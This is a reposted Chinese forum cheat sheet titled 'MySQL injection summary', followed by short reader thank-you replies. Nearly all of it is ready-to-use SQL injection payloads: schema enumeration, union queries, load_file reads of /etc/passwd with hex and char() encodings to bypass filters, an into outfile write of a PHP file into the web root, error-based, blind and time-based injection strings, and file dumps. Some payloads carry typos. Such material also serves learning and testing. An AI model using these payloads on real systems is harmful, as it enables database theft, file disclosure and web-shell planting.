MySQL注入总结

Jumbo

转载备份

1、Mysql中的注释符

1. 
   
2.      #：注释从#字符到行尾，记得url编码
   
3.      –：注释从–序列到行尾，后面需要跟上一个或多个空格，tab也可以
   
4.      /* */：注释中间的字符
   

复制代码

2、获取元数据

1. select schema_name from information_schema.schemata limit 0,1  #查询数据库
   
2. select table_name from information_schema.tables where table_schema=database() limit 0,1;  #查询表
   
3. select table_name from information_schema.tables where table_schema='bloodzer0' limit 0,1;
   
4. select table_name from information_schema.tables where table_schema=(select database()) limit 0,1;
   
5. select column_name from information_schema.columns where table_name='users' limit 0,1;  #查询列

复制代码

3、union查询

1. select id,username from users union select 1,2;     #mysql执行：语句正常；mssql执行：语句错误，数据类型不匹配，无法正常执行
   
2. select id,username from users union select 1,2 from dual;   #oracle执行：语句错误，数据类型不匹配

复制代码

4、MySQL函数利用

• load_file()
  

1. select * from users union select 1,load_file('/etc/passwd'),3;
   
2. select * from users union select 1,load_file(0x2F6574632F706173737764),3;  #使用16进制绕过单引号限制
   
3. select * from users union select 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3;
   
4. select * from users union select 1,hex(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),3;

复制代码

• into outfile
  

1. select '<?php phpinfo(); ?>' into outfile '/var/www/html/xxx.php';
   
2. select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php';

复制代码

• 连接字符串
  

     concat()函数

1. select username from users where id=1 union select concat(user(),',',database(),',',version());
   

复制代码

     concat_ws()函数

1. select username from users where id=1 union select concat_ws(0x2c,user(),database(),version());
   

复制代码

1. 
   
2. length                 返回字符串长度
   
3. substring            截取字符串长度
   
4. acsii                   返回ascii编码
   
5. hex                    把字符串转换为16进制
   
6. now                   当前系统时间
   
7. unhex                hex的反向操作
   
8. floor(x)              返回不大于x的最大正整数
   
9. md5                  返回md5值
   
10. group_concat   返回带有来自一个组的连接的非NULL值的字符串结果
    
11. @@datadir      数据目录
    
12. @@basedir     mysql安装目录
    
13. @@version_compile_os     操作系统

复制代码

5、报错注入

• 通过updatexml函数，执行sql语句
  

1. select username,password from users where id=1 and updatexml(1,concat(0x7c,(select user())),1);
   

复制代码

[/url]

• 通过extractvalue函数，执行sql语句
  

1. select * from users where id=1 and extractvalue(1,concat(0x7c,(select user())));
   

复制代码

[url=http://7xost7.com1.z0.glb.clouddn.com/wp-content/uploads/2016/05/32.png]

• 通过floor函数，执行sql语句
  

1. select username,password from users where id=1 union select * from (select count(*),concat(floor(rand()*2),(select user())) a from information_schema.tables group by a)b;
   

复制代码

[/url]

6、宽字节注入
     由于编码不统一所造成的，一般只出现在php+mysql中。网页编码是gbk
     由%d5或%df绕过：

[url=http://7xost7.com1.z0.glb.clouddn.com/wp-content/uploads/2016/05/34.png]

[/url]

7、MySQL长字符截取
     在mysql中有一个设置是sql_mode选项，当sql_mode设置为default时，没有开启strict_all_tables选项，对于插入超长的值只会提示warning，而不是error；特定的mysql版本mysql5.1中

[url=http://7xost7.com1.z0.glb.clouddn.com/wp-content/uploads/2016/05/35.png]

my.ini文件

[/url]

8、延时注入

1. select * from users where id=1 and if(length(user())=14,sleep(3),1);
   
2. select * from users where id=1 and if(mid(user(),1,1)='r',sleep(3),1);

复制代码

注入语句总结

1. 常规注入：
   
2.     1' order by num --+             判断字段长度
   
3.     1' union select 1,2,3 --+        确认字段数
   
4.     1' and 1=2 union select 1,2,3 --+    判断出错的字段位置 或者使用错误的id值-1或不存在的id
   
5.     1' and 1=2 union select version(),database(),user(),current_user,@@datadir,@basedir --+
   
6.     1' and 1=2 union select 1,table_schema,3 from information_schema.SCHEMATA --+
   
7.     1' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema="db_name"/database()/16进制 limit 0,1 --+
   
8.     1' and 1=2 union select 1,column_name,3 from information_schema.columns where table_name="table_name" limit 0,1 --+
   
9.     1' and 1=2 union select 1,group_conct(table_name) from information_schema.tables where table_schema=database() --+
   
10.     -1' union select 1,2,3 AND '1'='1     不适用注释符

复制代码

1. 双查询注入
   
2.     select database();
   
3.     select (select database());
   
4.     select concat((select database()));
   
5.     select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
   
6.     select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;
   
7.     select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables;
   
8.     select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a;
   
9.     select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a;
   
10.     select count(*),concat(0x3a,0x3a,(select table_name from information_schema.table where table_schema=database() limi 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a;
    
11. 
    
12.     1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.table where table_schema=database() limi 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
    
13. 
    
14. BOOL盲注：
    
15.     1' AND (ascii(substr((select database()),1,1))) = 99 --+
    
16.     1' AND (ascii(substr((select table_name from information_schema.tables limit 0,1),1,1)))>100 --+
    
17. 
    
18. TIME盲注：
    
19.     1' AND select if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(10),null) --+
    
20. 
    
21. Dump file：
    
22.     select * from table_name into outfile "/tmp/test.txt";
    
23.     select * from table_name into dumpfile "/tmp/test.txt";
    
24.     select load_file("/tmp/test.txt");  

复制代码

附件：
      [url=https://yunpan.cn/cSHFYExc5x2Ea]https://yunpan.cn/cSHFYExc5x2Ea （提取码：656b）

973

收藏了。。

ERROR:

我收下了！

FishOng丶

新人刚到，学习一下

gudan

看看。。。。

ouy666

新人刚到，学习一下

xema

学习一下，感谢撸主